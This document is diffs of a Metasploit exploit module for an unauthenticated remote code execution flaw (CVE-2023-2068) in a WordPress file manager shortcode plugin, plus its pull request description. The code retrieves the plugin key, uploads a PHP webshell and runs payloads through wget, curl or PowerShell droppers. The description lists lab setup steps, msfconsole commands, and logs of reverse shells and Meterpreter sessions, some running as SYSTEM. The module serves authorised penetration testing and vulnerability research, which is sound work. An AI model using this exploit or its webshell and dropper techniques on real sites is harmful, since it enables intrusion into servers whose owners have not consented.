+      # 2. Get the upload directory path information by searching for strings:
+      # /path: 'upload',/ or /path:'upload',/ or /"path":"upload",/
+      path_match1 = res.body.match(/path:.*'.*',/)
+      path_match2 = res.body.match(/"path":".*",/)
+      return if path_match1.nil? && path_match2.nil?
+
+      if path_match1
+        @wp_data['path'] = path_match1[0].split(',')[0].split(':')[1].tr('\'', '').strip
+      else
+        @wp_data['path'] = path_match2[0].split(',')[0].split(':')[1].tr('"', '').strip
+      end
+      print_status("path: #{@wp_data['path']}")
+
+      # 3. Determine Wordpress baseurl
+      # search in html content for:
+      # <script src='http(s)://ip/<wp-base>/wp-content/plugins/file-manager-advanced-shortcode/js/shortcode.js?ver=6.2.2' id='fma-shortcode-js-js'></script>
+      # split off /wp-content and http(s)://ip part to determine the <wp-base> which can be empty.
+      baseurl_match = res.body.match(%r{src=.*wp-content/plugins/file-manager-advanced-shortcode/})
+      return if baseurl_match.nil?
+
+      @wp_data['baseurl'] = baseurl_match[0].split('/wp-content')[0].split('/')[3]
+      print_status("base_url: #{@wp_data['baseurl']}")
+    end
+  end
+
+  def check
+    check_fma_shortcode_plugin
+    return CheckCode::Safe("Could not find fmakey. Shortcode plugin not installed or check your TARGETURI \"#{datastore['TARGETURI']}\" setting.") if @wp_data['fmakey'].nil?
+
+    CheckCode::Appears("fmakey successfully retrieved: #{@wp_data['fmakey']}")
+  end
+
+  def exploit
+    # check if fmakey is already set from the check method otherwise try to find the key.
+    check_fma_shortcode_plugin unless datastore['AutoCheck']
+    fail_with(Failure::NotVulnerable, "Could not find fmakey. Shortcode plugin not installed or check your TARGETURI \"#{datastore['TARGETURI']}\" setting.") if @wp_data['fmakey'].nil?
+
+    fail_with(Failure::NotVulnerable, "Webshell #{@webshell_name} upload failed.") unless upload_webshell
+    register_file_for_cleanup(@webshell_name.to_s)
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :php
+      execute_php(payload.encoded)
+    when :unix_cmd, :windows_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper, :windows_dropper
+      execute_cmdstager({ linemax: target.opts['Space'] })
+    when :windows_powershell
+      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
+    end
+  end
+end

--- a/modules/exploits/multi/http/wp_plugin_fma_shortcode_unauth_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_fma_shortcode_unauth_rce.rb
@@ -3,15 +3,12 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core/exploit/powershell'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
   include Msf::Exploit::FileDropper
-  include Msf::Exploit::Powershell
   include Msf::Exploit::Format::PhpPayloadPng
   include Msf::Exploit::Remote::HTTP::Wordpress
   prepend Msf::Exploit::Remote::AutoCheck

--- a/modules/exploits/multi/http/wp_plugin_fma_shortcode_unauth_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_fma_shortcode_unauth_rce.rb
@@ -13,6 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
   include Msf::Exploit::Powershell
   include Msf::Exploit::Format::PhpPayloadPng
+  include Msf::Exploit::Remote::HTTP::Wordpress
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -274,7 +275,6 @@ class MetasploitModule < Msf::Exploit::Remote
       else
         @wp_data['path'] = path_match2[0].split(',')[0].split(':')[1].tr('"', '').strip
       end
-      print_status("path: #{@wp_data['path']}")
 
       # 3. Determine Wordpress baseurl
       # search in html content for:
@@ -284,11 +284,12 @@ class MetasploitModule < Msf::Exploit::Remote
       return if baseurl_match.nil?
 
       @wp_data['baseurl'] = baseurl_match[0].split('/wp-content')[0].split('/')[3]
-      print_status("base_url: #{@wp_data['baseurl']}")
     end
   end
 
   def check
+    return CheckCode::Safe('Server not online or not detected as WordPress.') unless wordpress_and_online?
+
     check_fma_shortcode_plugin
     return CheckCode::Safe("Could not find fmakey. Shortcode plugin not installed or check your TARGETURI \"#{datastore['TARGETURI']}\" setting.") if @wp_data['fmakey'].nil?
 

--- a/modules/exploits/multi/http/wp_plugin_fma_shortcode_unauth_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_fma_shortcode_unauth_rce.rb
@@ -73,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'linux',
               'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
               'Type' => :linux_dropper,
-              'Space' => 65535,
+              'Linemax' => 65535,
               'CmdStagerFlavor' => ['wget', 'curl', 'printf', 'bourne'],
               'DefaultOptions' => {
                 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
@@ -92,23 +92,12 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ],
           [
-            'Windows Powershell',
-            {
-              'Platform' => 'win',
-              'Arch' => [ARCH_X64, ARCH_X86],
-              'Type' => :windows_powershell,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
-              }
-            }
-          ],
-          [
             'Windows Dropper',
             {
               'Platform' => 'win',
               'Arch' => [ARCH_X64, ARCH_X86],
               'Type' => :windows_dropper,
-              'Space' => 3000,
+              'Linemax' => 3000,
               'CmdStagerFlavor' => ['psh_invokewebrequest', 'vbs', 'debug_asm', 'debug_write', 'certutil'],
               'DefaultOptions' => {
                 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
@@ -311,9 +300,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when :unix_cmd, :windows_cmd
       execute_command(payload.encoded)
     when :linux_dropper, :windows_dropper
-      execute_cmdstager({ linemax: target.opts['Space'] })
-    when :windows_powershell
-      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
+      execute_cmdstager({ linemax: target.opts['Linemax'] })
     end
   end
 end


### PR DESCRIPTION
WordPress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode. 

The WordPress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.
This leads to RCE in cases where the allowed MIME type list does not include PHP files.
In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.

File Manager Advanced Shortcode plugin version `2.3.2` and lower are vulnerable.
To install the Shortcode plugin, File Manager Advanced version `5.0.5` or lower is required to keep the configuration vulnerable. Any user can exploit this vulnerability which results in access to the underlying operating system
with the same privileges under which the WordPress web services run.

This module has been tested on:
* Windows  Server 2019 Standard and Kali Linux running on Raspberry PI.
* WordPress 6.2.2
* File Manager Advanced 5.0.5
* File Manager Advanced Shortcode 2.3.2

**Instructions for a vulnerable WordPress installation:**
For Windows and Linux follow these instructions to install and configure WordPress: [Install WordPress locally](https://www.hostinger.com/tutorials/install-wordpress-locally)

After you have successfully installed and configures WordPress, follow the below steps to install the vulnerable plugins and configure a web page with the file-manager-advanced shortcode embedded.
1. Download WordPress plugins:
* [File Manager Advanced 5.0.5](https://github.com/h00die-gr3y/Metasploit/blob/main/images/file-manager-advanced.zip)
* [File Manager Advanced Shortcode 2.3.2](https://github.com/h00die-gr3y/Metasploit/blob/main/images/file-manager-advanced-shortcode-2.3.2-mdnhux.zip)
2. Login as admin in WordPress
3. On left side Menu, goto `Plugins`
5. Click `Add New` on the submenu
6. Page with installed Plugins appears. Click on the top on the button `Add New`
7. Page with list of Plugins appears. Click on the top on the button `Upload Plugin`
8. Page with `browse` button appears. Browse for file-manager-advanced.zip file that you have downloaded in step 1.
9. Click `install` button
10. Repeat same process for `file-manager-advanced-shortcode-2.3.2-mdnhux.zip`
11. When both plugins are installed successfully, configure a webpage with the file-manager-advanced shortcode embedded:
* Example [/] shortcode:
```
[file_manager_advanced login="yes" roles="author,editor,administrator" path="wp-content" hide="plugins" operations=block_users="5" view="grid" theme="light" lang ="en" upload_allow="image/png" upload_max_size="2G"]
```
12. Set the `TARGETURI` option with the uripath pointing to this webpage
13. Run the module and enjoy a `reverse shell` or `meterpreter`

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce`
- [ ] `set rhosts <ip-target>`
- [ ] `set rport <port>`
- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper, 3=Windows Command, 4=Windows Dropper>`
- [ ] `exploit`
- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings

```
msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > info

       Name: Wordpress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode
     Module: exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce
   Platform: Windows, Unix, Linux, PHP
       Arch: cmd, php, x64, x86, aarch64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2023-05-31

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  Mateus Machado Tesser

Module side effects:
 artifacts-on-disk
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHP
      1   Unix Command
      2   Linux Dropper
      3   Windows Command
      4   Windows Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting                Required  Description
  ----       ---------------                --------  -----------
  Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     192.168.201.10                 yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT      80                             yes       The target port (TCP)
  SSL        false                          no        Negotiate SSL/TLS for outgoing connections
  SSLCert                                   no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /wordpress/index.php/fma-auth  yes       File Manager Advanced (FMA) Shortcode URI path
  URIPATH                                   no        The URI to use for this exploit (default is random)
  VHOST                                     no        HTTP server virtual host
  WEBSHELL                                  no        The name of the webshell with extension php. Webshell name will be randomly generated if left unset.


  When TARGET is not 0:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all
                                       addresses.
  SRVPORT  1981             yes       The local port to listen on.

Payload information:

Description:
  The Wordpress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.
  This leads to RCE in cases where the allowed MIME type list does not include PHP files.
  In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.
  File Manager Advanced Shortcode plugin version `2.3.2` and lower are vulnerable.
  To install the Shortcode plugin File Manager Advanced version `5.0.5` or lower is required to keep the configuration
  vulnerable. Any user privileges can exploit this vulnerability which results in access to the underlying operating system
  with the same privileges under which the Wordpress web services run.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2023-2068
  https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-2068
  https://packetstormsecurity.com/files/172707
  https://wpscan.com/vulnerability/58f72953-56d2-4d86-a49b-311b5fc58056


View the full module info with the info -d command.
```
## Scenarios
### Windows Server 2019 PHP - php/meterpreter/reverse_tcp
```
msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.55
[+] Deleted KBWxIdRChosZC.php
[*] Meterpreter session 1 opened (192.168.201.10:4444 -> 192.168.201.55:50380) at 2023-06-28 14:13:07 +0000

meterpreter > sysinfo
Computer    : WIN-BJDNH44EEDB
OS          : Windows NT WIN-BJDNH44EEDB 10.0 build 17763 (Windows Server 2016) AMD64
Meterpreter : php/windows
meterpreter > getuid
Server username: SYSTEM
meterpreter >
```
### Kali Linux Server Unix Command -  cmd/unix/reverse_bash
```
msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 5a669fda54
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted LlCresesS.php
[*] Command shell session 5 opened (192.168.201.10:4444 -> 192.168.201.10:56290) at 2023-06-28 15:34:20 +0000

uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### Kali Linux Server Linux Dropper -  linux/aarch64/meterpreter_reverse_tcp
```
msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 5a669fda54
[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
[*] Using URL: http://192.168.201.10:1981/manX3C
[*] Client 192.168.201.10 (Wget/1.21.3) requested /manX3C
[*] Sending payload to 192.168.201.10 (Wget/1.21.3)
[+] Deleted nypafHKuf.php
[*] Meterpreter session 6 opened (192.168.201.10:4444 -> 192.168.201.10:38108) at 2023-06-28 15:36:11 +0000
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.10
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: www-data
meterpreter >
```
### Windows Server 2019 Windows Command - cmd/windows/powershell/x64/meterpreter/reverse_tcp
```
msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
[*] Executing Windows Command for cmd/windows/powershell/x64/meterpreter/reverse_tcp
[*] Sending stage (200774 bytes) to 192.168.201.55
[+] Deleted HAJSKquhaDT.php
[*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.55:50464) at 2023-06-28 14:21:39 +0000

meterpreter > sysinfo
Computer        : WIN-BJDNH44EEDB
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
### Windows Server 2019 Windows Dropper - windows/x64/meterpreter/reverse_tcp
```
msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
[*] Executing Windows Dropper for windows/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.10:1981/yRZ6hM
[*] Client 192.168.201.55 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1) requested /yRZ6hM
[*] Sending payload to 192.168.201.55 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1)
[*] Sending stage (200774 bytes) to 192.168.201.55
[+] Deleted hjAQqbEFAt.php
[*] Meterpreter session 4 opened (192.168.201.10:4444 -> 192.168.201.55:50519) at 2023-06-28 14:26:02 +0000
[*] Command Stager progress - 100.00% done (146/146 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer        : WIN-BJDNH44EEDB
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
